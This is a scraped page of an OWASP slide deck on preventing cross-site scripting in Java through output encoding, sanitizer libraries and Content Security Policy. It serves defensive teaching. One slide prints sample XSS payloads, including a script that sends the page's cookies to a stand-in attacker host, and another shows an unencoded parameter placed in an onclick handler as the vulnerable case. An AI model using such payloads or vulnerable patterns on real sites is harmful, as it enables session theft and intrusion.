Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 

Cross Site Scripting (XSS) Defense with Java

  • 1. The OWASP Foundation http://www.owasp.org Cross Site Scripting Contextual Output Encoding Secure JS/JSON Workflow
  • 4. The OWASP Foundation http://www.owasp.org Encoding Output Safe ways to represent dangerous characters in a web page Characters Decimal Hexadecimal HTML Character Set Unicode " (double quotation marks) &#34; &#x22; &quot; u0022 ' (single quotation mark) &#39; &#x27; &apos; u0027 & (ampersand) &#38; &#x26; &amp; u0026 < (less than) &#60; &#x3C; &lt; u003c > (greater than) &#62; &#x3E; &gt; u003e
  • 5. The OWASP Foundation http://www.owasp.org XSS Attack Payloads – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
  • 6. The OWASP Foundation http://www.owasp.org <script>var img = new Image();img.src='https://evileviljim.co m/owasp/data=' + document.cookie;</script> <script>document.body.innerHTML=' <marquee>thick as manure half as useful </marquee>'; </script> Sample XSS Attacks
  • 7. The OWASP Foundation http://www.owasp.org XSS Defense by Data Type and Context Data Type Context Defense String HTML Body HTML Entity Encode String HTML Attribute Minimal Attribute Encoding String GET Parameter URL Encoding String Untrusted URL URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification String CSS Strict structural validation, CSS Hex encoding, good design HTML HTML Body HTML Validation (JSoup, AntiSamy, HTML Sanitizer) Any DOM DOM XSS Cheat Sheet Untrusted JavaScript Any Sandboxing JSON Client Parse Time JSON.parse() or json2.js Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
  • 8. The OWASP Foundation http://www.owasp.org OWASP XSS Prevention Cheatsheet https://www.owasp.org/index.php/XS S_(Cross_Site_Scripting)_Prevention_ Cheat_Sheet 1+ Million Page Views
  • 9. The OWASP Foundation http://www.owasp.org OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project Ruby on Rails http://api.rubyonrails.org/classes/ERB/Util.html Reform Project Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP https://www.owasp.org/index.php/Category:OWASP_Encoding_Project ESAPI PHP.NET, Python, Classic ASP, Cold Fusion https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API .NET AntiXSS Library http://wpl.codeplex.com/releases/view/80289 Encoding Libraries
  • 10. The OWASP Foundation http://www.owasp.org OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project • No third party libraries or configuration necessary. • This code was designed for high-availability/high- performance encoding functionality. • Simple drop-in encoding functionality • Redesigned for performance • More complete API (uri and uri component encoding, etc) in some regards. • This is a Java 1.5 project. • Will be the default encoder in the next revision of ESAPI. • Last updated February 14, 2013 (version 1.1)
  • 11. The OWASP Foundation http://www.owasp.org The Problem Web Page built in Java JSP is vulnerable to XSS The Solution <%-- Basic HTML Context --%> <body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body> <%-- HTML Attribute Context --%> <input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" /> <%-- Javascript Block context --%> <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg); </script> <%-- Javascript Variable context --%> <button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
  • 12. The OWASP Foundation http://www.owasp.org <b><%= Encode.forHtml(UNTRUSTED)%></b> <p>Title:<%= Encode.forHtml(UNTRUSTED)%></p> <textarea name="text"> <%= Encode.forHtmlContent(UNTRUSTED) %> </textarea> Basic HTML Encoding Contexts
  • 13. The OWASP Foundation http://www.owasp.org <input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" /> <input type="text" name="data" value=<%= Encode.forHtmlUnquotedAttribute(UNTRUSTED) %> /> Encoding HTML Attributes
  • 14. The OWASP Foundation http://www.owasp.org <%-- Encode URL parameter values --%> <a href="/search?value= <%=Encode.forUriComponent(parameterValue)%>&order=1#top"> <%-- Encode REST URL parameters --%> <a href="http://www.codemagi.com/page/ <%=Encode.forUriComponent(restUrlParameter)%>"> Encoding fragments of URL's
  • 15. The OWASP Foundation http://www.owasp.org URI uri = new URI(rawURI); // throws URISyntaxException if invalid URI // don't allow relative urls if (!uri.isAbsolute()) throw new ValidationException("not an absolute uri"); // don't allows javascript urls, etc... if (!"http".equals(uri.getScheme()) && !"https".equals(uri.getScheme())) throw new ValidationException("we only support http(s) urls"; // who legitimately uses user-infos in their urls?!? if (uri.getUserInfo() != null) throw new ValidationException("this can only be trouble"); // normalize to get rid of '.' and '..' path components uri = uri.normalize(); // get rid of '.' and '..' // check: uri.getHost() against whitelist/blacklist? // check: uri.getPort() for shenanigans? String validURL = uri.toASCIIString(); Validating URL's
  • 16. The OWASP Foundation http://www.owasp.org <a href=" <%= Encode.forHTMLAttribute(untrustedURL) %> "> Encode.forHtmlContent(untrustedURL) </a> Properly encoding a URL (linkable)
  • 17. The OWASP Foundation http://www.owasp.org <button onclick="alert('<%= Encode.forJavaScript(alertMsg) %>');"> click me</button> <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button> <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(alertMsg) %>"; alert(msg); </script> JavaScript Encoding Contexts
  • 18. The OWASP Foundation http://www.owasp.org <div style="background: url('<%=Encode.forCssUrl(value)%>');"> <style type="text/css"> background-color:'<%=Encode.forCssString(value)%>'; </style> CSS Encoding Context
  • 19. The OWASP Foundation http://www.owasp.org Nested Contexts Best to avoid: an element attribute calling a Javascript function etc - parsing chains <div onclick="showError('<%=request.getParameter("errorxyz") %>')" >An error occurred ....</div> Here we have a HTML attribute(onClick) and within a nested Javascript function call (showError). Parsing order: 1: HTML decode the contents of the onclick attribute. 2: When onClick is selected: Javascript Parsing of showError So we have 2 contexts here...HTML and Javascript (2 different browser parsers) Nested Encoding Contexts
  • 20. The OWASP Foundation http://www.owasp.org We need to apply "layered" encoding in the RIGHT order: 1) JavaScript encode 2) HTML Attribute Encode so it "unwinds" properly and is not vulnerable. <div onclick="showError ('<%= Encoder.encodeForHtml( Encoder.encodeForJavaScript( request.getParameter("error")%>')))" > An error occurred ....</div>
  • 22. The OWASP Foundation http://www.owasp.org OWASP HTML Sanitizer Project https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project • HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS. • This code was written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-html- sanitizer/wiki/AttackReviewGroundRules. • Very easy to use. • It allows for simple programmatic POSITIVE policy configuration (see below). No XML config. • Actively maintained by Mike Samuel from Google's AppSec team! • This is code from the Caja project that was donated by Google. It is rather high performance and low memory utilization.
  • 23. The OWASP Foundation http://www.owasp.org Solving Real World Problems with the OWASP HTML Sanitizer Project The Problem Web Page is vulnerable to XSS because of untrusted HTML The Solution PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML);
  • 24. The OWASP Foundation http://www.owasp.org PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("p") .allowElements( new ElementPolicy() { public String apply(String elementName, List<String> attrs) { attrs.add("class"); attrs.add("header-" + elementName); return "div"; } }, "h1", "h2", "h3", "h4", "h5", "h6")) .build(); String safeHTML = policy.sanitize(untrustedHTML);
  • 25. The OWASP Foundation http://www.owasp.org  SAFE use of JQuery  $(‘#element’).text(UNTRUSTED DATA); UNSAFE use of JQuery $(‘#element’).html(UNTRUSTED DATA);
  • 26. The OWASP Foundation http://www.owasp.org  Contextual encoding is a crucial technique needed to stop all types of XSS  jqencoder is a jQuery plugin that allows developers to do contextual encoding in JavaScript to stop DOM-based XSS  http://plugins.jquery.com/plugin- tags/security  $('#element').encode('html', cdata); JQuery Encoding with JQencoder
  • 27. The OWASP Foundation http://www.owasp.org Get rid of XSS, eh? A script-src directive that doesn‘t contain ‘unsafe-inline’ eliminates a huge class of cross site scripting I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT
  • 28. The OWASP Foundation http://www.owasp.org Content Security Policy • Anti-XSS W3C standard • Content Security Policy latest release version • http://www.w3.org/TR/CSP/ • Must move all inline script and style into external scripts • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use - Firefox/IE10PR: X-Content-Security-Policy - Chrome Experimental: X-WebKit-CSP - Content-Security-Policy-Report-Only • Define a policy for the site regarding loading of content
  • 31. The OWASP Foundation http://www.owasp.org OWASP JSON Sanitizer Project https://www.owasp.org/index.php/OWASP_JSON_Sanitizer • Given JSON-like content, converts it to valid JSON. • This can be attached at either end of a data-pipeline to help satisfy Postel's principle: Be conservative in what you do, be liberal in what you accept from others. • Applied to JSON-like content from others, it will produce well-formed JSON that should satisfy any parser you use. • Applied to your output before you send, it will coerce minor mistakes in encoding and make it easier to embed your JSON in HTML and XML.
  • 32. The OWASP Foundation http://www.owasp.org Solving Real World Problems with the OWASP JSON Sanitizer Project The Problem Web Page is vulnerable to XSS because of parsing of untrusted JSON incorrectly The Solution JSON Sanitizer can help with two use cases. 1) Sanitizing untrusted JSON on the server that is submitted from the browser in standard AJAX communication 2) Sanitizing potentially untrusted JSON server-side before sending it to the browser. The output is a valid Javascript expression, so can be parsed by Javascript's eval or by JSON.parse.
  • 33. The OWASP Foundation http://www.owasp.org <script id="init_data" type="application/json"> <%= Encode.forHtml(data.toJSON()); %> </script> Embed JSON Safely in HTML
  • 34. The OWASP Foundation http://www.owasp.org // external js file var dataElement = document.getElementById('init_data'); // unescape the content of the span var jsonText = dataElement.textContent || dataElement.innerText; var initData = JSON.parse(html_unescape(jsonText)); Embed JSON Safely in HTML
  • 35. The OWASP Foundation http://www.owasp.org Limit placement of JSON data into JQuery .val and .text $("input:text").val(json.description); $("p").text(json.fullname);
  • 36. The OWASP Foundation http://www.owasp.org Cross Site Scripting Contextual Output Encoding Secure JS/JSON Workflow

Notas del editor

  1. Don’t forget to valide
  2. this one modifies h1-h6 and changes it to different styles.DIV tag with class=&quot;header-h1&quot;
  3. Note: The issue with $() is being worked on and will hopefully be much harder to exploit in jQuery 1.8